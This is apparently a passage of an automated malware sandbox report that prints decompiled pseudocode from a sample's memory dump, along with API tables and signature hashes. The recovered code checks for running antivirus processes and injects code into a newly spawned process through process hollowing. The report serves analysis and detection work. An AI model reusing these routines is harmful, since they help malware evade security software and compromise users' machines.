					_t82 = _t84 + 0xc;
					if(_t70 == 0) {
						goto L22;
					}
					_t79 = 0;
					if(_t70 == 0) {
						goto L22;
					}
					do {
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == 0) {
							goto L18;
						}
						_t75 =  *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0));
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == GetCurrentProcessId()) {
							goto L18;
						}
						_t48 = E014629E0(_t71, 0x1460000, _t75,  &_v740, 0x288,  &_v8, E01466CA0);
						_t82 = _t82 + 0x18;
						if(_t48 != 0 && _v8 != 0) {
							goto L24;
						}
						L18:
						_t79 = _t79 + 1;
					} while (_t79 < _t70);
					_t74 = _a4;
					goto L22;
				}
				_t61 = E01467EF0("vsserv.exe");
				_t84 = _t84 + 4;
				if(_t61 != 0) {
					goto L10;
				}
				_t62 = E01467EF0("cfp.exe");
				_t84 = _t84 + 4;
				if(_t62 != 0) {
					goto L10;
				}
				_t63 = E01467EF0("ccavsrv.exe");
				_t84 = _t84 + 4;
				if(_t63 != 0) {
					goto L10;
				}
				_t64 = E01467EF0("cmdagent.exe");
				_t84 = _t84 + 4;
				if(_t64 != 0) {
					goto L10;
				}
				_t65 = E01467EF0("avp.exe");
				_t84 = _t84 + 4;
				if(_t65 != 0) {
					goto L10;
				}
				_t66 = E01467EF0("avpui.exe");
				_t84 = _t84 + 4;
				if(_t66 != 0) {
					goto L10;
				}
				_t67 = E01467EF0("ksde.exe");
				_t82 = _t84 + 4;
				if(_t67 == 0) {
					goto L22;
				}
				goto L10;
			}
































                                                                                                        0x01466a40
                                                                                                        0x01466a58
                                                                                                        0x01466a68
                                                                                                        0x01466a72
                                                                                                        0x01466a85
                                                                                                        0x01466a8a
                                                                                                        0x01466a95
                                                                                                        0x01466a9b
                                                                                                        0x01466aa0
                                                                                                        0x01466aa5
                                                                                                        0x01466c9a
                                                                                                        0x01466c9a
                                                                                                        0x01466aab
                                                                                                        0x01466aac
                                                                                                        0x01466ab4
                                                                                                        0x01466c0e
                                                                                                        0x01466c16
                                                                                                        0x01466c21
                                                                                                        0x01466c2a
                                                                                                        0x01466c2e
                                                                                                        0x01466c3b
                                                                                                        0x01466c4c
                                                                                                        0x01466c52
                                                                                                        0x01466c5c
                                                                                                        0x01466c7e
                                                                                                        0x01466c8d
                                                                                                        0x01466c92
                                                                                                        0x01466c92
                                                                                                        0x01466c94
                                                                                                        0x00000000
                                                                                                        0x01466c95
                                                                                                        0x01466abf
                                                                                                        0x01466ac4
                                                                                                        0x01466ac9
                                                                                                        0x01466b46
                                                                                                        0x01466b53
                                                                                                        0x01466b58
                                                                                                        0x01466b59
                                                                                                        0x01466bd6
                                                                                                        0x01466bf8
                                                                                                        0x01466bfd
                                                                                                        0x01466c02
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466c02
                                                                                                        0x01466b5b
                                                                                                        0x01466b62
                                                                                                        0x01466b64
                                                                                                        0x01466b69
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b6f
                                                                                                        0x01466b73
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b80
                                                                                                        0x01466b88
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b8a
                                                                                                        0x01466b99
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466bb6
                                                                                                        0x01466bbb
                                                                                                        0x01466bc0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466bcc
                                                                                                        0x01466bcc
                                                                                                        0x01466bcd
                                                                                                        0x01466bd1
                                                                                                        0x00000000
                                                                                                        0x01466bd1
                                                                                                        0x01466ad0
                                                                                                        0x01466ad5
                                                                                                        0x01466ada
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466ae1
                                                                                                        0x01466ae6
                                                                                                        0x01466aeb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466af2
                                                                                                        0x01466af7
                                                                                                        0x01466afc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b03
                                                                                                        0x01466b08
                                                                                                        0x01466b0d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b14
                                                                                                        0x01466b19
                                                                                                        0x01466b1e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b25
                                                                                                        0x01466b2a
                                                                                                        0x01466b2f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b36
                                                                                                        0x01466b3b
                                                                                                        0x01466b40
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 01467ED0: GetFileAttributesW.KERNEL32(?,?,014631D3,014647C4,014647C4,\System32\wuapp.exe,014647C4,?,00000000), ref: 01467ED6
                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 01466B91
                                                                                                          • Part of subcall function 01467EF0: Process32First.KERNEL32(00000000,00000128,00000001,00000002,00000000,?), ref: 01467F24
                                                                                                          • Part of subcall function 01467EF0: Process32Next.KERNEL32(00000000,00000128,00000000,?), ref: 01467F48
                                                                                                          • Part of subcall function 01467EF0: Process32Next.KERNEL32(00000000,00000128,00000000,00000128,00000000,?), ref: 01467F6D
                                                                                                          • Part of subcall function 01467EF0: CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?), ref: 01467F77
                                                                                                          • Part of subcall function 01467EF0: CloseHandle.KERNEL32(00000000,00000000,?), ref: 01467F86
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 01466C7E
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,7519F7F0,00000000), ref: 01466C8D
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,7519F7F0,00000000), ref: 01466C92
                                                                                                          • Part of subcall function 01467EF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?), ref: 01467F08
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$Process32$CreateNextProcess$AttributesCurrentFileFirstSnapshotToolhelp32
                                                                                                        • String ID: avp.exe$avpui.exe$bdagent.exe$ccavsrv.exe$cfp.exe$cmd.exe /C WScript "$cmdagent.exe$ksde.exe$vsserv.exe
                                                                                                        • API String ID: 3996573972-1880040858
                                                                                                        • Opcode ID: c20cffdb15bde1cc34bb655f65a096c5d7382ae691206741b99ae0934b4a9c93
                                                                                                        • Instruction ID: be0905a17e116e2e62ad5d00dd1904d760618804268db7c6d9412401662ceb9d
                                                                                                        • Opcode Fuzzy Hash: c20cffdb15bde1cc34bb655f65a096c5d7382ae691206741b99ae0934b4a9c93
                                                                                                        • Instruction Fuzzy Hash: 6A510D71D4030666FB209B92DD45FAB726D9B60B8CF15006BEA04B21B1FBB1EA448663
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01465E60, Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 300sleepprocessmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 81%
                                                                                                        			E01465E60(void* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				signed int _v56;
				char _v60;
				char _v132;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1324;
				char _v1372;
				signed int _t99;
				int _t107;
				void* _t109;
				void* _t116;
				intOrPtr _t117;
				signed int _t118;
				signed int _t122;
				void* _t132;
				void* _t145;
				void* _t151;
				void* _t153;
				void* _t154;
				signed int _t159;
				void* _t173;
				intOrPtr _t174;
				signed int _t175;
				signed int _t176;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr* _t185;
				signed int _t188;
				intOrPtr* _t192;
				void* _t199;
				void* _t204;
				void* _t205;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t223;
				signed int _t225;

				_t175 = __edx;
				_t154 = __ecx;
				_t153 = _t199;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				E01461BB0( &_v1372, 0, 0x4d0);
				_t185 =  *((intOrPtr*)(_t153 + 8));
				_t204 = (_t199 - 0x00000008 & 0xfffffff0) + 4 - 0x558 + 0xc;
				_v1324 = 0x100002;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x30], xmm0");
				_t215 =  *_t185 - 0x5a4d;
				if( *_t185 != 0x5a4d) {
					E01461CE0("0125789244697858", 0x10, _t185,  *((intOrPtr*)(_t153 + 0xc)));
					_t204 = _t204 + 0x10;
				}
				_t99 = E01461E50(_t154, _t175, _t215, "ntdll.dll");
				_v20 = _t99;
				_t205 = _t204 + 4;
				_v16 = _t175;
				_t156 = _t99 | _t175;
				if((_t99 | _t175) == 0 ||  *_t185 != 0x5a4d) {
					L34:
					__eflags = 0;
					return 0;
				} else {
					_t181 =  *((intOrPtr*)(_t185 + 0x3c)) + _t185;
					if( *_t181 != 0x4550) {
						goto L34;
					} else {
						E01461670( &_v132, 0, 0x44);
						E01461670( &_v40, 0, 0x10);
						_t208 = _t205 + 0x18;
						_v132 = 0x44;
						_push( &_v40);
						_push( &_v132);
						_push(0);
						_push(0);
						if( *0x1631bb8 == 0) {
							_push(4);
						} else {
							_push(0x800000c);
						}
						_t107 = CreateProcessW(0,  *(_t153 + 0x10), 0, 0, 0, ??, ??, ??, ??, ??);
						_t220 = _t107;
						if(_t107 == 0) {
							goto L34;
						} else {
							_t109 = E014661F0(_t156, _t175, _t220, _v20, _v16, _v36,  &_v1372);
							_t209 = _t208 + 0x10;
							_t221 = _t109;
							if(_t109 == 0) {
								L33:
								TerminateProcess(_v40, 0);
								CloseHandle(_v36);
								CloseHandle(_v40);
								goto L34;
							} else {
								asm("adc eax, 0x0");
								_t116 = E01466250(_v1236 + 0x10, _t175, _t221, _v20, _v16, _v40, _v1236 + 0x10, _v1232,  &_v60, 8,  &_v24);
								_t210 = _t209 + 0x20;
								if(_t116 == 0) {
									goto L33;
								} else {
									_t159 =  *((intOrPtr*)(_t181 + 0x34));
									_t176 = _v56;
									_t117 =  *((intOrPtr*)(_t181 + 0x30));
									_v20 = _t159;
									_t223 = _t176 - _t159;
									if(_t223 < 0) {
										L18:
										_t118 = E014672C0(_t227, _v40,  *((intOrPtr*)(_t181 + 0x30)),  *((intOrPtr*)(_t181 + 0x34)),  *((intOrPtr*)(_t181 + 0x50)), 0x3000, 4);
										_v20 = _t118;
										_v16 = _t176;
										if((_t118 | _t176) == 0 || E014674D0( &_v44, _t176, _v40, _t118, _t176, _t185,  *((intOrPtr*)(_t181 + 0x54)),  &_v44) == 0) {
											goto L33;
										} else {
											_t188 = _v20;
											if(E014673C0(_v40, _t188, _v16,  *((intOrPtr*)(_t181 + 0x54)), 2,  &_v48) == 0) {
												goto L33;
											} else {
												_t122 =  *(_t181 + 0x14) & 0x0000ffff;
												_v24 = 0;
												if(0 >=  *(_t181 + 6)) {
													L27:
													asm("adc eax, 0x0");
													if(E014674D0(_v1236 + 0x10, _t176, _v40, _v1236 + 0x10, _v1232, _t181 + 0x30, 8,  &_v44) == 0) {
														goto L33;
													} else {
														_t182 = _v16;
														_v1244 =  *((intOrPtr*)(_t181 + 0x28)) + _t188;
														asm("adc ecx, edi");
														_v1240 = 0;
														if(E01467230(0, _t176, _v36,  &_v1372) == 0 || E014671A0(0, _t176, _v36) == 0) {
															goto L33;
														} else {
															Sleep(0x1388);
															_t132 = VirtualAlloc(0, 0x138, 0x3000, 4);
															_v24 = _t132;
															if(_t132 != 0) {
																E01461BB0(_t132, 0, 0x138);
																E014674D0(0, _t176, _v40, _t188, _t182, _v24, 0x138,  &_v16);
																VirtualFree(_v24, 0, 0x8000);
															}
															CloseHandle(_v36);
															CloseHandle(_v40);
															return _v32;
														}
													}
												} else {
													_t192 = _t181 + 0x2c + _t122;
													while(1) {
														asm("adc eax, [ebp-0x4]");
														if(E014674D0( *((intOrPtr*)(_t192 - 8)) + _v20, _t176, _v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *_t192 +  *((intOrPtr*)(_t153 + 8)),  *((intOrPtr*)(_t192 - 4)),  &_v44) == 0) {
															goto L33;
														}
														_t145 = E01466300( *((intOrPtr*)(_t192 + 0x10)));
														_t210 = _t210 + 4;
														asm("adc eax, [ebp-0x4]");
														if(E014673C0(_v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *((intOrPtr*)(_t192 - 0xc)), _t145,  &_v48) == 0) {
															goto L33;
														} else {
															_t192 = _t192 + 0x28;
															_t173 = _v24 + 1;
															_v24 = _t173;
															if(_t173 < ( *(_t181 + 6) & 0x0000ffff)) {
																continue;
															} else {
																_t188 = _v20;
																goto L27;
															}
														}
														goto L35;
													}
													goto L33;
												}
											}
										}
									} else {
										_t174 = _v60;
										if(_t223 > 0 || _t174 >= _t117) {
											_v16 =  *((intOrPtr*)(_t181 + 0x50));
											_v16 = _v16 +  *((intOrPtr*)(_t181 + 0x30));
											_t185 =  *((intOrPtr*)(_t153 + 8));
											asm("adc eax, [ebp-0x8]");
											_t225 = _t176;
											if(_t225 > 0 || _t225 >= 0 && _t174 > _v16) {
												goto L18;
											} else {
												_t151 = E01467120(_t176, _v40, _t174, _t176);
												_t227 = _t151;
												if(_t151 != 0) {
													goto L33;
												} else {
													goto L18;
												}
											}
										} else {
											goto L18;
										}
									}
								}
							}
						}
					}
				}
				L35:
			}



















































                                                                                                        0x01465e60
                                                                                                        0x01465e60
                                                                                                        0x01465e61
                                                                                                        0x01465e70
                                                                                                        0x01465e8c
                                                                                                        0x01465e91
                                                                                                        0x01465e99
                                                                                                        0x01465e9c
                                                                                                        0x01465ea6
                                                                                                        0x01465ea9
                                                                                                        0x01465eae
                                                                                                        0x01465eb1
                                                                                                        0x01465ebe
                                                                                                        0x01465ec3
                                                                                                        0x01465ec3
                                                                                                        0x01465ecb
                                                                                                        0x01465ed2
                                                                                                        0x01465ed5
                                                                                                        0x01465ed8
                                                                                                        0x01465edb
                                                                                                        0x01465edd
                                                                                                        0x014661de
                                                                                                        0x014661df
                                                                                                        0x014661e8
                                                                                                        0x01465eec
                                                                                                        0x01465eef
                                                                                                        0x01465ef7
                                                                                                        0x00000000
                                                                                                        0x01465efd
                                                                                                        0x01465f05
                                                                                                        0x01465f12
                                                                                                        0x01465f17
                                                                                                        0x01465f1a
                                                                                                        0x01465f2b
                                                                                                        0x01465f2f
                                                                                                        0x01465f30
                                                                                                        0x01465f32
                                                                                                        0x01465f34
                                                                                                        0x01465f3d
                                                                                                        0x01465f36
                                                                                                        0x01465f36
                                                                                                        0x01465f36
                                                                                                        0x01465f4a
                                                                                                        0x01465f50
                                                                                                        0x01465f52
                                                                                                        0x00000000
                                                                                                        0x01465f58
                                                                                                        0x01465f68
                                                                                                        0x01465f6d
                                                                                                        0x01465f70
                                                                                                        0x01465f72
                                                                                                        0x014661c3
                                                                                                        0x014661c8
                                                                                                        0x014661d7
                                                                                                        0x014661dc
                                                                                                        0x00000000
                                                                                                        0x01465f78
                                                                                                        0x01465f91
                                                                                                        0x01465f9f
                                                                                                        0x01465fa4
                                                                                                        0x01465fa9
                                                                                                        0x00000000
                                                                                                        0x01465faf
                                                                                                        0x01465faf
                                                                                                        0x01465fb2
                                                                                                        0x01465fb5
                                                                                                        0x01465fb8
                                                                                                        0x01465fbb
                                                                                                        0x01465fbd
                                                                                                        0x01465ff9
                                                                                                        0x0146600c
                                                                                                        0x01466013
                                                                                                        0x01466018
                                                                                                        0x0146601b
                                                                                                        0x00000000
                                                                                                        0x0146603b
                                                                                                        0x0146603b
                                                                                                        0x01466055
                                                                                                        0x00000000
                                                                                                        0x0146605b
                                                                                                        0x0146605b
                                                                                                        0x01466061
                                                                                                        0x0146606c
                                                                                                        0x014660e2
                                                                                                        0x014660fb
                                                                                                        0x0146610a
                                                                                                        0x00000000
                                                                                                        0x01466110
                                                                                                        0x01466115
                                                                                                        0x0146611a
                                                                                                        0x0146612a
                                                                                                        0x0146612c
                                                                                                        0x01466139
                                                                                                        0x00000000
                                                                                                        0x0146614b
                                                                                                        0x01466150
                                                                                                        0x01466164
                                                                                                        0x0146616a
                                                                                                        0x0146616f
                                                                                                        0x01466179
                                                                                                        0x01466192
                                                                                                        0x014661a1
                                                                                                        0x014661a1
                                                                                                        0x014661b0
                                                                                                        0x014661b5
                                                                                                        0x014661c2
                                                                                                        0x014661c2
                                                                                                        0x01466139
                                                                                                        0x0146606e
                                                                                                        0x01466071
                                                                                                        0x01466073
                                                                                                        0x01466088
                                                                                                        0x01466097
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014660a0
                                                                                                        0x014660a5
                                                                                                        0x014660b8
                                                                                                        0x014660c7
                                                                                                        0x00000000
                                                                                                        0x014660cd
                                                                                                        0x014660d0
                                                                                                        0x014660d7
                                                                                                        0x014660d8
                                                                                                        0x014660dd
                                                                                                        0x00000000
                                                                                                        0x014660df
                                                                                                        0x014660df
                                                                                                        0x00000000
                                                                                                        0x014660df
                                                                                                        0x014660dd
                                                                                                        0x00000000
                                                                                                        0x014660c7
                                                                                                        0x00000000
                                                                                                        0x01466073
                                                                                                        0x0146606c
                                                                                                        0x01466055
                                                                                                        0x01465fbf
                                                                                                        0x01465fbf
                                                                                                        0x01465fc2
                                                                                                        0x01465fce
                                                                                                        0x01465fd3
                                                                                                        0x01465fd6
                                                                                                        0x01465fd9
                                                                                                        0x01465fdc
                                                                                                        0x01465fde
                                                                                                        0x00000000
                                                                                                        0x01465fe7
                                                                                                        0x01465fec
                                                                                                        0x01465ff1
                                                                                                        0x01465ff3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01465ff3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01465fc2
                                                                                                        0x01465fbd
                                                                                                        0x01465fa9
                                                                                                        0x01465f72
                                                                                                        0x01465f52
                                                                                                        0x01465ef7
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 01465F4A
                                                                                                        • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,00000008,?,?,?,?,?,00000002,?), ref: 01466150
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,?,?,?,?,?,?,?,00003000,00000004), ref: 01466164
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000004), ref: 014661A1
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 014661B0
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 014661B5
                                                                                                          • Part of subcall function 014674D0: GetCurrentProcess.KERNEL32(00000000,?,00000000,?,0146C038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 014674FF
                                                                                                          • Part of subcall function 014673C0: GetCurrentProcess.KERNEL32(?,?,?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 01467429
                                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,014649E6,?), ref: 014661C8
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,014649E6,?), ref: 014661D7
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,014649E6,?), ref: 014661DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleProcess$CurrentVirtual$AllocCreateFreeSleepTerminate
                                                                                                        • String ID: 0125789244697858$ntdll.dll
                                                                                                        • API String ID: 1806556286-2057982665
                                                                                                        • Opcode ID: 16f3ce30a227ddef1283f3bdfd302ce016c7c6a03096d7c9a796b8e8a31f9c3e
                                                                                                        • Instruction ID: dc83f1455f4bc23eade9d934770dfca9749fc1aa5d68ec150ee0513036f37eff
                                                                                                        • Opcode Fuzzy Hash: 16f3ce30a227ddef1283f3bdfd302ce016c7c6a03096d7c9a796b8e8a31f9c3e
                                                                                                        • Instruction Fuzzy Hash: 8CB185B1D00209FBEF14DB95DD41FEEBBB9FF14708F14405AEA04A62A1E771A950CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01465A50, Relevance: 16.6, APIs: 11, Instructions: 117memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 56%
                                                                                                        			E01465A50(void* __ecx, void* _a4, void* _a8, long* _a12, long* _a16) {
				void* _v8;
				void* _t31;
				int _t32;
				int _t36;
				void* _t44;
				long _t46;
				void* _t56;
				void* _t60;

				 *_a12 = 0;
				 *_a16 = 0;
				_t56 = VirtualAlloc(0, 0x40, 0x3000, 4);
				if(_t56 == 0) {
					L3:
					return 0;
				} else {
					if(ReadProcessMemory(_a4, _a8, _t56, 0x40, 0) != 0) {
						if( *_t56 != 0x5a4d) {
							goto L2;
						} else {
							_v8 =  *((intOrPtr*)(_t56 + 0x3c));
							VirtualFree(_t56, 0, 0x8000);
							_t44 = VirtualAlloc(0, 0x18, 0x3000, 4);
							if(_t44 == 0) {
								L11:
								return 0;
							} else {
								_t31 = _a8 + _v8;
								_v8 = _t31;
								_t32 = ReadProcessMemory(_a4, _t31, _t44, 0x18, 0);
								_push(0x8000);
								_push(0);
								_push(_t44);
								if(_t32 == 0 ||  *_t44 != 0x4550) {
									L10:
									VirtualFree();
									goto L11;
								} else {
									VirtualFree();
									_t46 = ( *(_t44 + 0x14) & 0x0000ffff) + 0x18;
									_t60 = VirtualAlloc(0, _t46, 0x3000, 4);
									if(_t60 == 0) {
										goto L11;
									} else {
										_t36 = ReadProcessMemory(_a4, _v8, _t60, _t46, 0);
										_push(0x8000);
										_push(0);
										_push(_t60);
										if(_t36 != 0) {
											if( *_t60 != 0x4550) {
												goto L10;
											} else {
												 *_a12 =  *(_t60 + 0x50);
												 *_a16 =  *(_t60 + 0x28);
												VirtualFree(??, ??, ??);
												return 1;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					} else {
						L2:
						VirtualFree(_t56, 0, 0x8000);
						goto L3;
					}
				}
			}











                                                                                                        0x01465a61
                                                                                                        0x01465a73
                                                                                                        0x01465a7b
                                                                                                        0x01465a7f
                                                                                                        0x01465aa4
                                                                                                        0x01465aab
                                                                                                        0x01465a81
                                                                                                        0x01465a94
                                                                                                        0x01465ab4
                                                                                                        0x00000000
                                                                                                        0x01465ab6
                                                                                                        0x01465ac8
                                                                                                        0x01465acb
                                                                                                        0x01465ada
                                                                                                        0x01465ade
                                                                                                        0x01465b49
                                                                                                        0x01465b51
                                                                                                        0x01465ae0
                                                                                                        0x01465ae3
                                                                                                        0x01465aef
                                                                                                        0x01465af2
                                                                                                        0x01465af8
                                                                                                        0x01465afd
                                                                                                        0x01465aff
                                                                                                        0x01465b02
                                                                                                        0x01465b47
                                                                                                        0x01465b47
                                                                                                        0x00000000
                                                                                                        0x01465b0c
                                                                                                        0x01465b10
                                                                                                        0x01465b19
                                                                                                        0x01465b25
                                                                                                        0x01465b29
                                                                                                        0x00000000
                                                                                                        0x01465b2b
                                                                                                        0x01465b35
                                                                                                        0x01465b3b
                                                                                                        0x01465b40
                                                                                                        0x01465b42
                                                                                                        0x01465b45
                                                                                                        0x01465b58
                                                                                                        0x00000000
                                                                                                        0x01465b5a
                                                                                                        0x01465b60
                                                                                                        0x01465b68
                                                                                                        0x01465b6a
                                                                                                        0x01465b74
                                                                                                        0x01465b74
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01465b45
                                                                                                        0x01465b29
                                                                                                        0x01465b02
                                                                                                        0x01465ade
                                                                                                        0x01465a96
                                                                                                        0x01465a96
                                                                                                        0x01465a9e
                                                                                                        0x00000000
                                                                                                        0x01465a9e
                                                                                                        0x01465a94

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004,00005A4D,75145B60,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465A79
                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000040,00000000,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465A8C
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0146563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 01465A9E
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,014649E6,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465ACB
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465AD8
                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000018,00000000,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465AF2
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0146563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 01465B10
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465B1F
                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465B35
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0146563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 01465B47
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0146563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 01465B6A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$Free$AllocMemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1260273505-0
                                                                                                        • Opcode ID: 729f5a53a3871015c3383a575776d4ea2f79195505641e6089ba2537cfe2e28f
                                                                                                        • Instruction ID: 75850b68579b6554f3f4db7a2cc445b277a689cdc1b1e0bf94284e81a4b4515b
                                                                                                        • Opcode Fuzzy Hash: 729f5a53a3871015c3383a575776d4ea2f79195505641e6089ba2537cfe2e28f
                                                                                                        • Instruction Fuzzy Hash: CE316071741714BBEB319F99DC41F9A7BA8AF05B59F100055FB04AF2E1D6B1A8008BA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01467FA0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 56libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 22%
                                                                                                        			E01467FA0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t22;

				_t22 = LoadLibraryA("Shell32.dll");
				if(_t22 == 0) {
					L8:
					return 0;
				} else {
					_t11 = GetProcAddress(_t22, "SHGetKnownFolderPath");
					if(_t11 == 0) {
						_t12 = GetProcAddress(_t22, "SHGetFolderPathW");
						if(_t12 == 0) {
							goto L7;
						} else {
							_push(_a4);
							_push(0);
							_push(0);
							_push(_a12);
							_push(0);
							if( *_t12() == 0) {
								goto L4;
							} else {
								goto L7;
							}
						}
					} else {
						_v8 = 0;
						_push( &_v8);
						_push(0);
						_push(0);
						_push(_a8);
						if( *_t11() != 0) {
							L7:
							FreeLibrary(_t22);
							goto L8;
						} else {
							E01461A00(_a4, _v8);
							__imp__CoTaskMemFree(_v8);
							L4:
							FreeLibrary(_t22);
							return 1;
						}
					}
				}
			}







                                                                                                        0x01467fb0
                                                                                                        0x01467fb4
                                                                                                        0x0146802f
                                                                                                        0x01468035
                                                                                                        0x01467fb6
                                                                                                        0x01467fbc
                                                                                                        0x01467fc4
                                                                                                        0x0146800c
                                                                                                        0x01468014
                                                                                                        0x00000000
                                                                                                        0x01468016
                                                                                                        0x01468016
                                                                                                        0x01468019
                                                                                                        0x0146801b
                                                                                                        0x0146801d
                                                                                                        0x01468020
                                                                                                        0x01468026
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01468026
                                                                                                        0x01467fc6
                                                                                                        0x01467fc9
                                                                                                        0x01467fd0
                                                                                                        0x01467fd1
                                                                                                        0x01467fd3
                                                                                                        0x01467fd5
                                                                                                        0x01467fdc
                                                                                                        0x01468028
                                                                                                        0x01468029
                                                                                                        0x00000000
                                                                                                        0x01467fde
                                                                                                        0x01467fe4
                                                                                                        0x01467fef
                                                                                                        0x01467ff5
                                                                                                        0x01467ff6
                                                                                                        0x01468005
                                                                                                        0x01468005
                                                                                                        0x01467fdc
                                                                                                        0x01467fc4

                                                                                                        APIs
